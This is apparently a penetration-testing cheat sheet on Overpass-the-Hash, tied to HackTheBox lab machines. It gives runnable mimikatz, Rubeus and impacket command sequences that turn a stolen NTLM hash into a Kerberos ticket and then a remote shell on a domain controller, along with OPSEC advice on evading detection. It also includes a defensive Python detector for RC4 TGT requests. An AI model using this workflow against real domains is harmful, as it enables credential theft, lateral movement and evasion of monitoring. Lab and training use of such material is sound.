Overpass-the-Hash
# Overview
Overpass-the-Hash converts an NTLM hash into a valid Kerberos TGT (Ticket Granting Ticket) by requesting one directly from the Domain Controller using the NTLM hash as the pre-authentication material. Unlike standard Pass-the-Hash (which uses NTLM authentication directly), Overpass-the-Hash obtains Kerberos tickets, enabling access to Kerberos-only services and resources that require Kerberos authentication.
# Prerequisites
- NTLM hash of a domain user (any user with Kerberos pre-authentication)
- Access to the Kerberos service (port 88) on the Domain Controller
- Time synchronization with DC (within 5 minutes)
- mimikatz, Rubeus (Windows), or impacket-getTGT (Linux)
# When to Use Overpass-the-Hash vs PTH
| Scenario | Use |
|---|---|
| Target service requires Kerberos (IIS with Windows Auth) | Overpass-the-Hash |
| SMB/WinRM/RDP with NTLM auth | Pass-the-Hash (simpler) |
| Need to access resources across domain trusts via Kerberos | Overpass-the-Hash |
| Windows integrated authentication in web apps | Overpass-the-Hash |
# Exploitation / Execution
## 1. Mimikatz (from elevated Windows shell)
```powershell
mimikatz # privilege::debug
mimikatz # sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<NTLM_hash> /run:cmd.exe
```
This spawns a new cmd.exe that first requests a Kerberos TGT using the provided NTLM hash, then uses Kerberos for any subsequent network authentication. The user's Kerberos tickets are visible via klist in the new window.
## 2. Rubeus asktgt (from Windows)
```powershell
.\Rubeus.exe asktgt /user:<user> /domain:<domain> /rc4:<NTLM_hash> /nowrap
# Example:
.\Rubeus.exe asktgt /user:administrator /domain:htb.local /rc4:d9485863c1e9e05851aa40cbb4ab9dff /nowrap
```
Then inject the resulting base64 ticket into the current logon session:
```powershell
.\Rubeus.exe ptt /ticket:<base64_ticket>
```
## 3. impacket-getTGT (from Linux)
```bash
# Request TGT using NTLM hash (RC4 key); the LM half is left empty before the colon
impacket-getTGT <domain>/<user> -hashes :<NTLM_hash>
# Or with AES256 key:
impacket-getTGT <domain>/<user> -aesKey <AES256_key>
# getTGT writes <user>.ccache to the current directory; point the Kerberos libs at it
export KRB5CCNAME=<user>.ccache
# Use with any Kerberos-aware tool (-k: use the ccache, -no-pass: don't prompt)
impacket-psexec <domain>/<user>@<IP> -k -no-pass
impacket-wmiexec <domain>/<user>@<IP> -k -no-pass
```
## 4. Combined Workflow (Hash to Shell)
```bash
# Step 1: Get TGT from hash
impacket-getTGT htb.local/administrator -hashes :d9485863c1e9e05851aa40cbb4ab9dff
# Step 2: Export ticket
export KRB5CCNAME=administrator.ccache
# Step 3: Sync time with the DC (Kerberos rejects requests outside the skew window)
sudo ntpdate -u dc.htb.local
# Step 4: Execute (target must be addressed by hostname so the SPN resolves)
impacket-psexec htb.local/administrator@dc.htb.local -k -no-pass
```
# Post-Execution Verification
```powershell
klist # List Kerberos tickets (should show TGT)
klist tgt # Show TGT specifically
whoami # Verify user context
dir \\DC\C$ # Test Kerberos auth to a network share
```
# Common Pitfalls
- ⚠️ Clock skew > 5 minutes -> Kerberos auth fails silently. Fix: `sudo ntpdate -u <DC_IP>`
- ⚠️ AES256 key preferred over RC4 (NTLM) on modern DCs -> use `-aesKey` with impacket or `/aes256` with Rubeus
- ⚠️ NTLM hash must be of a user with Kerberos pre-authentication -> disabled accounts won't work
# OPSEC Considerations
- 🛡️ TGT request generates Event ID 4768 (Kerberos Authentication Service) with Pre-Authentication Type 0 (not encrypted timestamp)
- 🛡️ TGT from RC4 hash may be flagged by ATA/Defender for Identity as downgraded encryption
- 🛡️ Prefer AES256 key over RC4 hash when available for lower detection probability
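Detection logic for the 4768 signal described above, as an added example that is not part of the original page: it parses constructed 4768 records (made-up `HTB.LOCAL` events, not captured logs) and flags user TGTs issued with RC4 (0x17) on a domain that otherwise negotiates AES, with an assumed allowlist for legacy RC4-only accounts.

```python
import re

# Constructed sample 4768 (Kerberos TGT request) records as key=value pairs,
# in the order the Security event message lists them. Made-up data.
SAMPLE_4768_EVENTS = """\
TargetUserName=administrator TargetDomainName=HTB.LOCAL TicketEncryptionType=0x17 PreAuthType=2 IpAddress=::ffff:10.10.14.5 Status=0x0
TargetUserName=svc_backup TargetDomainName=HTB.LOCAL TicketEncryptionType=0x12 PreAuthType=2 IpAddress=::ffff:10.10.10.20 Status=0x0
TargetUserName=legacy_svc TargetDomainName=HTB.LOCAL TicketEncryptionType=0x17 PreAuthType=2 IpAddress=::ffff:10.10.10.30 Status=0x0
TargetUserName=jdoe TargetDomainName=HTB.LOCAL TicketEncryptionType=0x17 PreAuthType=2 IpAddress=::ffff:10.10.14.5 Status=0x0
TargetUserName=krbtgt TargetDomainName=HTB.LOCAL TicketEncryptionType=0x17 PreAuthType=2 IpAddress=::ffff:10.10.14.5 Status=0x18
"""

RC4_HMAC = 0x17
ENC_NAMES = {0x11: "AES128-CTS", 0x12: "AES256-CTS", 0x17: "RC4-HMAC", 0x18: "RC4-HMAC-EXP"}


def parse_4768(line):
    """Turn one key=value record into a dict; hex-valued fields become ints."""
    fields = dict(re.findall(r"(\w+)=(\S+)", line))
    for key in ("TicketEncryptionType", "PreAuthType", "Status"):
        if key in fields:
            fields[key] = int(fields[key], 0)  # base 0 understands the 0x prefix
    return fields


def find_rc4_tgt_requests(events_text, allowlist=frozenset()):
    """Return successful 4768 events whose TGT was encrypted with RC4.

    On a domain where accounts negotiate AES, an RC4 (0x17) user TGT is the
    artefact of a TGT requested with the NTLM hash. `allowlist` (assumed) holds
    accounts known to be RC4-only, e.g. legacy service accounts.
    """
    findings = []
    for line in events_text.splitlines():
        ev = parse_4768(line)
        if not ev or ev.get("Status", 0) != 0:
            continue  # failed requests (non-zero Status) issue no ticket
        user = ev["TargetUserName"]
        if ev["TicketEncryptionType"] == RC4_HMAC and user.lower() not in allowlist:
            findings.append({"user": user,
                             "ip": ev["IpAddress"].replace("::ffff:", ""),
                             "enc": ENC_NAMES[RC4_HMAC]})
    return findings


def sources_with_multiple_rc4_users(findings, threshold=2):
    """Source IPs that obtained RC4 TGTs for at least `threshold` distinct accounts."""
    per_ip = {}
    for f in findings:
        per_ip.setdefault(f["ip"], set()).add(f["user"].lower())
    return sorted(ip for ip, users in per_ip.items() if len(users) >= threshold)
```

Run the two functions over `SAMPLE_4768_EVENTS` with `allowlist={"legacy_svc"}`; the single host that pulled RC4 TGTs for two different accounts is the one worth triaging first.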
# Post-Exploitation Value
- Access to Kerberos-only services (web apps, cross-trust resources)
- TGT can be used to request service tickets for any service
- No password knowledge required -- hash is sufficient
- Enables ticket-based persistence strategies
# Cross-References
## Tool References
| Tool | Link |
|---|---|
| mimikatz | https://github.com/gentilkiwi/mimikatz |
| Rubeus | https://github.com/GhostPack/Rubeus |
| impacket | https://github.com/fortra/impacket |
## Source Machines
- Sauna (Easy, AD) - Overpass-the-Hash from DCSync Administrator hash
- Forest (Easy, AD) - Kerberos service access via hash-to-TGT